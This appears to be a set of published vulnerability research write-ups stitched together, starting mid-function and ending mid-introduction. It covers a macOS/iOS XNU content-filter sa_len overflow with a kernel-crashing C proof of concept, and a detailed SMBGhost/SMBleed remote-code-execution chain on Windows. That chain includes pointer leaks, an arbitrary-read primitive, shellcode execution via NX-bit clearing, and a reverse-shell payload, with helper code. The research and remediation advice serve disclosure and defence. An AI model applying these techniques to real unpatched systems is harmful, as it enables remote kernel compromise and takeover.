	errno_t error = 0;
	uint32_t filter_control_unit;

	socket_lock_assert_owned(so);

	/* Limit ourselves to TCP that are not MPTCP subflows */
	if ((so->so_proto->pr_domain->dom_family != PF_INET &&
	    so->so_proto->pr_domain->dom_family != PF_INET6) ||
	    so->so_proto->pr_type != SOCK_STREAM ||
	    so->so_proto->pr_protocol != IPPROTO_TCP ||
	    (so->so_flags & SOF_MP_SUBFLOW) != 0 ||
	    (so->so_flags1 & SOF1_CONTENT_FILTER_SKIP) != 0) {
		goto done;
	}

	filter_control_unit = necp_socket_get_content_filter_control_unit(so);
	if (filter_control_unit == 0) {
		goto done;
	}

	if (filter_control_unit == NECP_FILTER_UNIT_NO_FILTER) {
		goto done;
	}
	if ((filter_control_unit & NECP_MASK_USERSPACE_ONLY) != 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_userspace_only);
		goto done;
	}
	if (cfil_active_count == 0) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_in_vain);
		goto done;
	}
	if (so->so_cfil != NULL) {
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_already);
		CFIL_LOG(LOG_ERR, "already attached");
	} else {
		cfil_info_alloc(so, NULL);
		if (so->so_cfil == NULL) {
			error = ENOMEM;
			OSIncrementAtomic(&cfil_stats.cfs_sock_attach_no_mem);
			goto done;
		}
		so->so_cfil->cfi_dir = dir;
	}
	if (cfil_info_attach_unit(so, filter_control_unit, so->so_cfil) == 0) {
		CFIL_LOG(LOG_ERR, "cfil_info_attach_unit(%u) failed",
		    filter_control_unit);
		OSIncrementAtomic(&cfil_stats.cfs_sock_attach_failed);
		goto done;
	}
	CFIL_LOG(LOG_INFO, "so %llx filter_control_unit %u sockID %llx",
	    (uint64_t)VM_KERNEL_ADDRPERM(so),
	    filter_control_unit, so->so_cfil->cfi_sock_id);

	so->so_flags |= SOF_CONTENT_FILTER;
	OSIncrementAtomic(&cfil_stats.cfs_sock_attached);

	/* Hold a reference on the socket */
	so->so_usecount++;

	/*
	 * Save passed addresses for attach event msg (in case resend
	 * is needed.
	 */
	if (remote != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len); // Part B
	}
	if (local != NULL) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len); // Part C
	}

	error = cfil_dispatch_attach_event(so, so->so_cfil, 0, dir);
	/* We can recover from flow control or out of memory errors */
	if (error == ENOBUFS || error == ENOMEM) {
		error = 0;
	} else if (error != 0) {
		goto done;
	}

	CFIL_INFO_VERIFY(so->so_cfil);
done:
	return error;
}

We can see in (Part A) that the function receives two sockaddr parameters (local and remote) which are user controlled, and then uses their sa_len struct member (remote in (Part B) and local in (Part C)) to copy data into cfi_so_attach_faddr and cfi_so_attach_laddr. Parts (A), (B) and (C) are all the result of new changes in XNU.

So what’s the problem? There is no check on sa_len, which can be set as high as 255 and is then used in a memcpy to copy data into a union sockaddr_in_4_6, a 28-byte struct, resulting in a buffer overflow.
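
For scale, here is a sketch of the destination union (as it appears in the xnu headers) next to the copy that overflows it:

/* Largest member is struct sockaddr_in6 -- 28 bytes. */
union sockaddr_in_4_6 {
	struct sockaddr     sa;
	struct sockaddr_in  sin;    /* 16 bytes */
	struct sockaddr_in6 sin6;   /* 28 bytes */
};

/* sa_len is an 8-bit, fully caller-controlled field, so: */
memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
/* with sa_len == 255, this writes 227 bytes past the end of the union. */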

The PoC below is almost identical to Ian Beer’s mptcp PoC, with two changes. It requires a prerequisite to reach the vulnerable area: in order to trigger the vulnerability we need an MDM-enrolled device with an NECP policy, or to attach the socket to a valid filter_control_unit. One way to do that is to create one with cfilutil and then manually write it to kernel memory using a kernel debugger.

After running the POC, it will crash the kernel:

#include <sys/socket.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, const char * argv[]) {

	int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if (sock < 0) {
		printf("socket failed\n");
		return -1;
	}
	printf("got socket: %d\n", sock);
	struct sockaddr* sockaddr_dst = malloc(256);
	memset(sockaddr_dst, 'A', 256);
	sockaddr_dst->sa_len = 255;
	sockaddr_dst->sa_family = AF_INET;
	sa_endpoint_t eps = {0};
	eps.sae_srcif = 0;
	eps.sae_srcaddr = NULL;
	eps.sae_srcaddrlen = 0;
	eps.sae_dstaddr = sockaddr_dst;
	eps.sae_dstaddrlen = 255;
	int err = connectx(sock, &eps, SAE_ASSOCID_ANY, 0, NULL, 0, NULL, NULL);
	printf("err: %d\n", err);
	close(sock);
	return 0;
}

0x3- Patch

The patch for this issue is also interesting, because while the source code (iOS 13.6 / macOS 10.15.6) provides this fix:

if (remote != NULL && (remote->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_faddr, remote, remote->sa_len);
	}
	if (local != NULL && (local->sa_len <= sizeof(union sockaddr_in_4_6))) {
		memcpy(&so->so_cfil->cfi_so_attach_laddr, local, local->sa_len);
	}

The disassembly shows something else…

Here is a picture of the vulnerable part in macOS 10.15.1 compiled kernel (before the issue was reported):

Here is a picture of the vulnerable part in macOS 10.15.6 compiled kernel (after the issue was reported):

The panic call with the memcpy_chk is gone alongside the patch!

Did the original developer know this function was vulnerable and place the check there as a placeholder until a proper patch? Your guess is as good as ours.

Also note that the call to memcpy_chk before the real_mode_bootstrap_end (which is a wrapper around memcpy) is what kept this issue from being exploitable.

0x4- What can we take from this?

  1. Read comments; they might give us valuable information
  2. Newly added code is oftentimes buggy
  3. Content filter code is complex and tricky
  4. Now, with Pangu’s recent blog post and Ian Beer’s mptcp bug, we can see that sockaddr->sa_len has already caused multiple issues and should be audited a bit more carefully.

0x5- Attacks in the wild?

This issue is not dangerous. During our investigation of this bug, ZecOps checked its targeted threats intelligence database, and saw no active attacks associated with this issue. We still advise to update to the latest version to receive all other updates.


SMBleedingGhost Writeup Part III: From Remote Read (SMBleed) to RCE

Introduction

Previous SMBleedingGhost write-ups: 

In the previous part of the series, SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE, we described two techniques that allow us to read uninitialized memory from the pool buffers allocated by the SrvNetAllocateBuffer function of the srvnet.sys module. The first technique accomplishes that by crafting a special SMB packet and deducing information from the server’s response. The second technique, which has fewer limitations, does that by sending specially crafted compressed data and deducing information depending on whether the server drops the connection.

The next thing we had to understand was: what can be done with this reading ability? As a reminder, we began this research with a write-what-where primitive that we demonstrated in our previous research about achieving local privilege escalation. Since most of the memory layout in the modern Windows versions is randomized, we need to have at least one pointer to be able to do something useful with the write-what-where primitive. Unfortunately, memory allocated with the SrvNetAllocateBuffer function is mostly used for network data such as SMB packets and doesn’t contain system pointers. We could try and read uninitialized memory left by a previous allocation that wasn’t done with SrvNetAllocateBuffer, but it would be difficult to predict where to look for a pointer in this case, especially since we can’t run code on the target computer that could help us grooming the pool (unlike in the case of a local privilege escalation, for example). So we started looking for something more reliable.


SrvNetAllocateBuffer and the allocated buffer layout

As we already mentioned in our local privilege escalation research, the SrvNetAllocateBuffer function doesn’t just return a buffer with the requested size. Instead, it returns a pointer to a struct that is located at the bottom of the pool-allocated memory block, containing information about the allocated buffer. The layout of the pool-allocated memory block is the following:

While our reading technique can only read bytes from the “User buffer” region, we can use the integer overflow bug to copy parts of the SRVNET_BUFFER_HDR struct to the “User buffer” region of another buffer, which we can then read. We can do that by setting the Offset field to point at the SRVNET_BUFFER_HDR struct beyond the data we want to read. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

Hunting for pointers

Let’s take a look at the fields of the SRVNET_BUFFER_HDR struct and see whether there’s something worth reading:

#pragma pack(push, 1)
struct SRVNET_BUFFER_HDR {
/*00*/  LIST_ENTRY ConnectionBufferList;                 // (orange)
/*10*/  WORD BufferFlags; // 0x01 - no transport header, 0x02 - part of a lookaside list
/*12*/  WORD LookasideListIndex; // 0 to 8
/*14*/  WORD LookasideListLogicalProcessor;
/*16*/  WORD TracingDataCount; // 0, 1 or 2, for TracingPtr1/2, TracingUnknown1/2
/*18*/  PBYTE UserBufferPtr;                             // (blue)
/*20*/  DWORD UserBufferSizeAllocated;
/*24*/  DWORD UserBufferSizeUsed;
/*28*/  DWORD PoolAllocationSize;
/*2C*/  BYTE unknown1[4];
/*30*/  PBYTE PoolAllocationPtr;                         // (blue)
/*38*/  PMDL pMdl1;                                      // (blue)
/*40*/  DWORD BytesProcessed;
/*44*/  BYTE unknown2[4];
/*48*/  SIZE_T BytesReceived;
/*50*/  PMDL pMdl2;                                      // (blue)
/*58*/  PVOID pSrvNetWskStruct;                          // (orange)
/*60*/  DWORD SmbFlags;
/*64*/  PVOID TracingPtr1;                               // (orange)
/*6C*/  SIZE_T TracingUnknown1;
/*74*/  PVOID TracingPtr2;                               // (orange)
/*7C*/  SIZE_T TracingUnknown2;
/*84*/  BYTE unknown3[12];
};
#pragma pack(pop)

The marked variables are pointers. The pointers marked (blue) all point inside the pool-allocated memory block, at offsets that can be calculated in advance, so it’s enough to read one of them. Having an absolute pointer to the pool-allocated memory block will surely be helpful. Regarding the pointers marked (orange):

  • ConnectionBufferList – A linked list of all of the received, unhandled buffers of a connection. The list head is a part of the connection object created by the SrvNetAllocateConnection function in srvnet.sys. A buffer is added to the list by the SrvNetWskReceiveComplete function. In our case, there will be only one buffer in the list, so both pointers (Flink and Blink of the LIST_ENTRY struct) will point to the list head inside the connection object.
  • pSrvNetWskStruct – Initially, a pointer to the connection object mentioned above. The pointer is set by the SrvNetWskReceiveEvent function, but is overridden by the SrvNetWskReceiveComplete function with the pointer to the SRVNET_BUFFER_HDR struct. Thus, reading it is not more useful than reading one of the other blue-colored pointers. By the way, if you search for “pSrvNetWskStruct“ you’ll find out that it played a role in exploiting EternalBlue.
  • TracingPtr1/2 – These pointers are only used when tracing is enabled, as it seems.

As you can see, the only other useful pointer for us to read is one of the pointers from the ConnectionBufferList struct. Both pointers (Blink and Flink of the LIST_ENTRY struct) point to the connection object. The object struct has been named SRVNET_RECV by EternalBlue researchers, so we’ll use this name as well.

Getting a module base address

Now that we know how to get the two pointers – a pointer to a pool-allocated memory block and a pointer to an SRVNET_RECV struct – we can freely modify the two buffers using the write-what-where primitive. There are probably several ways from this point to achieve RCE, but we had a feeling that getting a base address of a module would be the most straightforward option since there are so many things we can modify in a data section of a module. As we’ve seen, none of the pointers in a memory block allocated by SrvNetAllocateBuffer point to a module. We had hopes for the SRVNET_RECV struct, but we didn’t find pointers that point to a module there, too. On the bright side, there are several pointers to modules one additional dereference away:

At this point, we noticed that since we can override those pointers in SRVNET_RECV, we can call an arbitrary function by replacing the HandlerFunctions pointer and triggering one of the events, e.g. closing the connection so that Srv2DisconnectHandler is called. This will come in handy later, but we didn’t have any function pointers to call yet, so we continued with our attempt to get a module base address.

Unlike writing, reading those pointers is not as easy since our technique allows us to read only from the “User buffer” region. So close, yet so far. Since we can get and modify a pool-allocated memory block and an SRVNET_RECV struct, we hoped to find code that we can trigger that does a double-dereference-read followed by a double-dereference-write with two variables that we control, similar to the following:

ptr1 = *(pSrvNetRecv + offset1)
value = *ptr1
ptr2 = *(pSrvNetRecv + offset2)
*ptr2 = value

If we could find such a snippet, we would trigger it to copy the first pointer (e.g. HandlerFunctions) to the “User buffer” region, read it, then copy the second pointer (e.g. the Srv2ConnectHandler function pointer) to the “User buffer” region and read it as well, deducing the module base address from it. We searched for such a snippet for a long time, but didn’t find a good match. Finally, we settled for a sub-optimal option which nevertheless worked. Let’s take a look at the relevant part of the SrvNetFreeBuffer function (simplified):

void SrvNetFreeBuffer(PSRVNET_BUFFER_HDR Buffer)
{
    PMDL pMdl1 = Buffer->pMdl1;
    PMDL pMdl2 = Buffer->pMdl2;

    if (pMdl2->MdlFlags & 0x0020) {
        // MDL_PARTIAL_HAS_BEEN_MAPPED flag is set.
        MmUnmapLockedPages(pMdl2->MappedSystemVa, pMdl2);
    }

    if (Buffer->BufferFlags & 0x02) {
        if (Buffer->BufferFlags & 0x01) {
            pMdl1->MappedSystemVa = (BYTE*)pMdl1->MappedSystemVa + 0x50;
            pMdl1->ByteCount -= 0x50;
            pMdl1->ByteOffset += 0x50;
            pMdl1->MdlFlags |= 0x1000; // MDL_NETWORK_HEADER

            pMdl2->StartVa = (PVOID)((ULONG_PTR)pMdl1->MappedSystemVa & ~0xFFF);
            pMdl2->ByteCount = pMdl1->ByteCount;
            pMdl2->ByteOffset = pMdl1->MappedSystemVa & 0xFFF;
            pMdl2->Size = /* some calculation */;
            pMdl2->MdlFlags = 0x0004; // MDL_SOURCE_IS_NONPAGED_POOL
        }

        Buffer->BufferFlags = 0;

        // ...

        pMdl1->Next = NULL;
        pMdl2->Next = NULL;

        // Return the buffer to the lookaside list.
    } else {
        SrvNetUpdateMemStatistics(NonPagedPoolNx, Buffer->PoolAllocationSize, FALSE);
        ExFreePoolWithTag(Buffer->PoolAllocationPtr, '00SL');
    }
}

Upon freeing the buffer, if buffer flags 0x02 (the buffer is part of a lookaside list) and 0x01 (the buffer has no transport header) are set, some operations are performed on the two MDL objects to add the transport header before the flags are reset to zero and the buffer is returned to the lookaside list. If we set aside the meaning behind the operations on the MDL objects for a moment and look at them purely in terms of memory manipulation, we can notice that the code does a double-dereference-read followed by a double-dereference-write with two variables that we control (the two MDL pointers), which is what we were looking for. The downside is that the content we want to read from is also modified (the pMdl1 field updates and the final pMdl1->Next = NULL assignment in the listing above), a side effect we hoped to avoid.

Given the above, here’s how we managed to read the AcceptSocket pointer:

1. Prepare buffer A from a lookaside list such that the “User buffer” region is filled with zeros. This buffer will end up holding the pointer that we’ll eventually read.

2. Prepare buffer B from a different lookaside list such that:

  • The pMdl1 pointer points at the address of the HandlerFunctions pointer minus 0x18, the offset of MappedSystemVa in the MDL struct.
  • The pMdl2 pointer points at the “User buffer” region of Buffer A.
  • The Flags field is set to 0x03.

We can override the SRVNET_BUFFER_HDR struct fields by decompressing them from a larger buffer using the technique described in the Observation #2 section of the previous part of the writeup.

3. When buffer B is freed, the following operations will take place:

  • The MDL flags will be read from the second MDL at buffer A. If the MDL_PARTIAL_HAS_BEEN_MAPPED flag is set, MmUnmapLockedPages will be called and the system will likely crash. That’s why we filled the buffer with zeros in step 1.
  • The HandlerFunctions pointer and the memory around it will be modified as depicted here:
+00 |  00 00 00 00 00 00 00 00
+08 |  __ __ __|10 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  [+50..................]  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  [-50......] [+50......]
  • The HandlerFunctions pointer and the memory around it will be read as depicted here:
+00 |  __ __ __ __ __ __ __ __
+08 |  __ __ __ __ __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  ab cd ef gh ij kl mn op  <--  HandlerFunctions
+20 |  __ __ __ __ __ __ __ __
+28 |  qr st uv wx __ __ __ __
  • The “User buffer” region of buffer A will be modified as depicted here: (The orange-colored bytes contain the pointer we want to read. We just need to order them properly.)
+00 |  00 00 00 00 00 00 00 00
+08 |  ?? ?? 04 00 __ __ __ __
+10 |  __ __ __ __ __ __ __ __
+18 |  __ __ __ __ __ __ __ __
+20 |  00 {c}0 {ef gh ij kl mn op}
+28 |  qr st uv wx {ab} 0{d} 00 00

4. Read the AcceptSocket pointer from the “User buffer” region of buffer A.

The good news: we managed to read the pointer. The bad news: we corrupted some data in the SRVNET_RECV struct. Luckily for us, the corruption doesn’t affect the system as long as nothing happens with the relevant connection. When something does happen, e.g. the connection closes, the system crashes. That’s not a problem since we’ll get RCE soon, and we can fix the corruption if we want to. We didn’t implement such a fix in our POC; it is left as an exercise for the reader.

After reading the AcceptSocket pointer, we used the same technique to read the srvnet!SrvNetWskConnDispatch pointer. We read the AcceptSocket pointer and not the HandlerFunctions pointer since the array of handler functions is shared between all connections, while the buffer pointed by AcceptSocket is not shared with other connections. Therefore, we can corrupt the latter, affecting the stability of only a single connection.

If we have a copy of the srvnet.sys file used on the target computer, we can just compute the offset of the SrvNetWskConnDispatch pointer in the module locally and subtract the offset from the pointer we read, getting the srvnet.sys module base address as a result. That’s what we did in our POC to keep things simple. One can improve it to be more general. One option that comes to mind is keeping several versions of srvnet.sys locally, and deducing the correct one by the least significant bytes of the read pointer.
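
A minimal sketch of that computation (the RVA value and the ReadLeakedPointer helper are hypothetical placeholders; in practice the RVA is computed locally from the matching copy of srvnet.sys):

// Hypothetical RVA of srvnet!SrvNetWskConnDispatch for the target build.
#define SRVNET_WSK_CONN_DISPATCH_RVA 0x3A2E0ull

ULONG64 leakedDispatchPtr = ReadLeakedPointer();   // value obtained with the technique above
ULONG64 srvnetBase = leakedDispatchPtr - SRVNET_WSK_CONN_DISPATCH_RVA;

// Module bases are page-aligned, so a wrong build guess usually shows up immediately.
if (srvnetBase & 0xFFF) {
    // try the RVA from another srvnet.sys version
}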

Implementing arbitrary read

From the beginning of this research we had a convenient write-what-where (arbitrary write) primitive, but had nothing that allowed us to read memory. We worked hard until now to gain some memory reading abilities, and at this point we felt that we had enough tools to make our life easier and implement a convenient arbitrary read primitive. We began by exploring the possibilities of calling an arbitrary function.

Given that we have the base address of the srvnet.sys module, we can call any of the module’s functions. But what about the function’s arguments? The srv2!Srv2ReceiveHandler function is called by SrvNetCommonReceiveHandler, and the call looks like this:

HandlerFunctions = *(PVOID **)(pSrvNetRecv + 0x118);
Arg1 = *(ULONG_PTR *)(pSrvNetRecv + 0x128);
Arg2 = *(ULONG_PTR *)(pSrvNetRecv + 0x130);
(HandlerFunctions[1])(Arg1, Arg2, Arg3, Arg4, Arg5, Arg6, Arg7, Arg8);

The first two arguments are read from the SRVNET_RECV struct, so we can control them. We don’t have as much control over the other arguments. The x86-64 calling convention specifies that it’s the caller’s responsibility to allocate and free the stack space for the arguments, so even though an 8-argument function is intended to be called, we can replace the pointer with a function that expects any other number of arguments, and it will work.

Here are the steps we used to trigger the function call:

  1. Send a specially crafted message so that the connection’s SRVNET_RECV struct pointer will be copied to a buffer we can read.
  2. Send another, valid message, which will reuse the same SRVNET_RECV struct, but don’t close the connection yet. Note that when a connection is closed, the SRVNET_RECV struct is not freed. The SrvNetPrepareConnectionForReuse function is called to reset the struct so that it can be reused for the next connection.
  3. Read the SRVNET_RECV struct pointer that we copied in step 1.
  4. Replace the HandlerFunctions pointer and the arguments using the write-what-where primitive.
  5. Send an additional message over the connection from step 2 so that the function that took the place of srv2!Srv2ReceiveHandler is called.

Now all we had to do was to find a convenient function to copy memory from one location to another, so that we can copy arbitrary memory to the pool buffer we can read from. memcpy comes to mind, and srvnet.sys does have such a function (memmove, to be precise), but this function requires a third argument, the amount of bytes to be copied, which we don’t control. Failing to find a convenient function that requires one or two arguments, we realized that we’re not limited by functions implemented in srvnet.sys, we can also call functions from srvnet’s import table by pointing HandlerFunctions at the right offset. There, we found the perfect function: RtlCopyUnicodeString.

The RtlCopyUnicodeString function gets two UNICODE_STRING pointers as arguments, and copies the content of the source string to the destination string. Unlike C strings, which are NULL-terminated, strings in the kernel are defined by the UNICODE_STRING struct, which holds a pointer to the string and the string’s length in bytes. The string buffer can hold any binary data. If you peek at the implementation of RtlCopyUnicodeString, you can see that the copying is done with the memmove function, i.e. plain binary data copying. All we have to do is prepare our two UNICODE_STRING structs, call RtlCopyUnicodeString, and then read the copied data.
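
For illustration, a minimal sketch of how the two descriptors could be packed, assuming the standard x64 UNICODE_STRING layout; the addresses and sizes below are placeholders.

import struct

def pack_unicode_string(buffer_ptr, length):
    # x64 UNICODE_STRING layout: USHORT Length, USHORT MaximumLength, 4 bytes padding, PVOID Buffer.
    return struct.pack("<HH4xQ", length, length, buffer_ptr)

# Placeholder addresses: the kernel address we want to read and a pool buffer we can read back.
target_kernel_address = 0xFFFFF80012345678
readable_pool_buffer  = 0xFFFFA500DEAD0000
read_size = 0x100

src_descriptor = pack_unicode_string(target_kernel_address, read_size)  # source string
dst_descriptor = pack_unicode_string(readable_pool_buffer, read_size)   # destination string
# Both descriptors are planted with the write primitive, their addresses are passed as the
# two arguments, and the copied bytes are then read back from the pool buffer.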

Executing shellcode

After achieving a convenient arbitrary read primitive, we moved on to the next challenge towards our goal of remote code execution: running a shellcode. We used the technique that Morten Schenk presented in his Black Hat USA 2017 talk (pages 47-51).

The idea is to write a shellcode below the KUSER_SHARED_DATA structure which is located at a constant address, the only address that is not randomized in the kernel memory layout of the recent Windows versions. Then modify the relevant page table entry, making the page executable. The base address of the page table entries in the kernel is randomized, but can be retrieved from the MiGetPteAddress function in ntoskrnl.exe. Here are the steps we used to execute our shellcode:

  1. Use our arbitrary read primitive to get the base address of ntoskrnl.exe from srvnet’s import table.
  2. Read the base address of the page table entries from the MiGetPteAddress function, as described in Morten’s slides.
  3. Write the shellcode at address KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800). Note that we could also use one of the pool buffers, using KUSER_SHARED_DATA is just more convenient.
  4. Calculate the relevant page table entry address and clear the NX bit to allow execution, as described in Morten’s slides.
  5. Call the shellcode using our ability to call an arbitrary function.
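
For steps 2 and 4, here is a rough sketch of the arithmetic involved; pte_base stands for the value recovered from MiGetPteAddress with the arbitrary-read primitive, and the index computation mirrors what that function performs.

KUSER_SHARED_DATA = 0xFFFFF78000000000
SHELLCODE_ADDR = KUSER_SHARED_DATA + 0x800

def pte_address(virtual_address, pte_base):
    # Mirrors what nt!MiGetPteAddress computes: index the self-mapped PTE region
    # by the virtual address's page number.
    return pte_base + ((virtual_address >> 9) & 0x7FFFFFFFF8)

def clear_nx(pte_value):
    # The execute-disable (NX) bit is bit 63 of a PTE; clearing it makes the page executable.
    return pte_value & ~(1 << 63)

# Read the PTE of SHELLCODE_ADDR with the arbitrary-read primitive, clear NX,
# write it back with the write primitive, then call the shellcode.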

Launching a reverse shell

Technically, we achieved remote code execution, so we could stop here. But if we’re not popping calc or launching a reverse shell, the POC is not complete, so we went on to fill that gap. Since our shellcode runs in kernel mode, we can’t just run cmd.exe or calc.exe and call it a day. We needed to find a way to get our code to run in user mode. While searching for prior work on the topic we found sleepya’s shellcode, written originally for EternalBlue exploits, which is designed to do just that. 

In short, here’s what the shellcode does:

  1. Hook IA32_LSTAR MSR to lower the IRQL (Interrupt Request Level) from DISPATCH_LEVEL to PASSIVE_LEVEL. The shellcode begins execution at the DISPATCH_LEVEL IRQL which imposes several limitations. For more information see the great explanation of zerosum0x0.
  2. Find a privileged user mode process (lsass.exe or spoolsv.exe) and queue a user mode APC in one of the alertable threads that is in waiting state.
  3. In the APC kernel routine, allocate EXECUTE_READWRITE memory and point the APC normal (user mode) routine there. Then copy the user mode shellcode to the newly allocated memory, prepended with a stub to create a new thread.
  4. In the APC normal routine a new thread is created, executing the user mode shellcode.

Published about three years ago, the shellcode didn’t work right away on recent Windows versions, so we had to make a couple of adjustments:

  1. Incompatibility with the KVA Shadow mitigation. In the blog post Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow zerosum0x0 explains why the first part of the shellcode, IA32_LSTAR MSR hooking, isn’t supported when the KVA Shadow mitigation is enabled, and proposes a fix. We tried the proposed fix, but it didn’t work on newer Windows versions – zerosum0x0 targeted Windows 10 version 1809 while we were targeting versions 1903 and 1909. The right thing to do is to improve the fix or find another solution, but we just removed the IRQL lowering part. As a result, the POC can sometimes crash the system while trying to access paged memory (bug check IRQL_NOT_LESS_OR_EQUAL), but it doesn’t happen often, so we left it as is since it’s good enough for a POC.
  2. Fixed finding the base address of ntoskrnl.exe. At first, we tried using zerosum0x0’s method – get an address of the first ISR (Interrupt Service Routine), which is located in ntoskrnl.exe, and search for a nearby PE header. The method didn’t work for us since the ISR pointer points to ntoskrnl’s INITKDBG section which is not mapped. Since we already found the ntoskrnl.exe base address, we fixed it by just passing it as an argument to the shellcode.
  3. Fixed a problem with finding the offset of ETHREAD.ThreadListEntry. The original code looked for the current thread in the thread list of the current process. The thread won’t be found if the current thread is attached to a different process than the one it was originally created in (see KeStackAttachProcess).
  4. Fixed the UserApcPending check in the KAPC_STATE struct for Windows 10 RS5 and newer, since from Windows 10 RS5 UserApcPending shares a byte with the newly added bit value, SpecialUserApcPending.

With the above fixed, we finally managed to make the shellcode work; we just needed to fill in the user mode part of the code to run. We used MSFvenom, the Metasploit payload generator, to generate a user mode shellcode to spawn a reverse shell.

Targets with more than one logical processor

In the Observation #1 section of the previous part of the writeup we assumed that our target has only one logical processor. With this assumption, we could rely on lookaside list buffer reuse, knowing that we get the same buffer every time as long as the allocation size is the same. As a reminder, the lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list.

With more than one logical processor, things are a bit more complicated – we get the same buffer only as long as the allocation is made on the same logical processor. Our first attempt at overcoming this limitation was redundancy. When writing to one of the lookaside list buffers, write multiple times. When reading from one of the lookaside list buffers, read multiple times and choose the most common value. This approach would work if the logical processor usage was distributed evenly, but we found that it’s not the case. We tested our POC in VirtualBox, and from our observations, some logical processors are preferred over others. For a setup of 4 logical cores, here’s the distribution of handling the incoming packet in a test execution:

Logical processor Incoming packets handled
Logical processor 1 0.2%
Logical processor 2 0.8%
Logical processor 3 7.9%
Logical processor 4 91.1%

Here’s the distribution of handling the decompression:

Logical processor Decompressions executed
Logical processor 1 13.3%
Logical processor 2 5.1%
Logical processor 3 6.8%
Logical processor 4 74.8%

As you can see, in this specific case logical processor 4 did most of the work. Logical processor 1 handled only 1 out of every 500 incoming packets!

We tweaked the POC so that it sends several packets simultaneously from multiple threads to improve the logical processor usage distribution. We also added error detection, so that if the data that is read doesn’t make sense, another reading attempt is made instead of proceeding and most likely crashing the system. The changes we made were enough to make the POC work with VirtualBox targets with multiple logical processors, but from a quick test the POC doesn’t work with VMware targets or (at least some) physical computers with multiple logical processors. We didn’t try to improve the POC further to support all targets, which we believe can be achieved with a better strategy for ordering the reads and writes.
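
As a sketch of the redundancy idea described above (not the final strategy we shipped): repeated reads with a majority vote, and a retry when no clear majority emerges; read_once is a placeholder for a single leak attempt.

from collections import Counter

def read_with_redundancy(read_once, attempts=9, max_retries=5):
    # read_once() stands in for one leak round over a fresh connection; repeating it and
    # taking the most common result compensates for allocations that land on a lookaside
    # list belonging to a different logical processor.
    for _ in range(max_retries):
        results = [read_once() for _ in range(attempts)]
        value, count = Counter(results).most_common(1)[0]
        if count > attempts // 2:
            return value
    raise RuntimeError("no stable value; reads too scattered across processors")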

Our POC with the improvements can be found in the GitHub repository.

If you’d like to study the code, we suggest starting with the initial, less noisy version which was designed for a single logical processor. It can be found in a previous commit here.

ZecOps Detection

ZecOps classifies forensic logs related to this issue as #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications. Besides SMBleed / SMBGhost, ZecOps Crash Forensics solutions can find other, previously unknown vulnerabilities that are exploited in the wild. If you care about persistent threats – we’ll be happy to assist.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Applying the latest security updates (recommended)
  • Blocking port 445 / enforcing host isolation
  • Disabling SMBv3.1.1 compression

Summary

This is the third and final part of the writeup, in which we used the findings from the previous parts to achieve RCE using SMBGhost and SMBleed. We hope you enjoyed the read. Here’s a recap of the milestones during our research on the SMB bugs:

  1. A write-what-where primitive, demonstrated in our previous research about achieving local privilege escalation.
  2. The discovery of the SMBleed bug, described in the first part of the writeup.
  3. An ability to read memory from the pool buffers allocated by the SrvNetAllocateBuffer function, demonstrated in Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE.
  4. An ability to get the base address of the srvnet.sys module.
  5. An ability to call an arbitrary function.
  6. Arbitrary memory read.
  7. Shellcode execution.


SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

Introduction

In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.


Aiming for RCE

Our previous research led to the local privilege escalation attack that we have shown in our previous writeup. SMBGhost can be used for an RCE attack, and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows leaking parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for unauthenticated RCE exploitation, the first thing we looked for was a way to read memory without authentication.

Diving into SMB

Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.

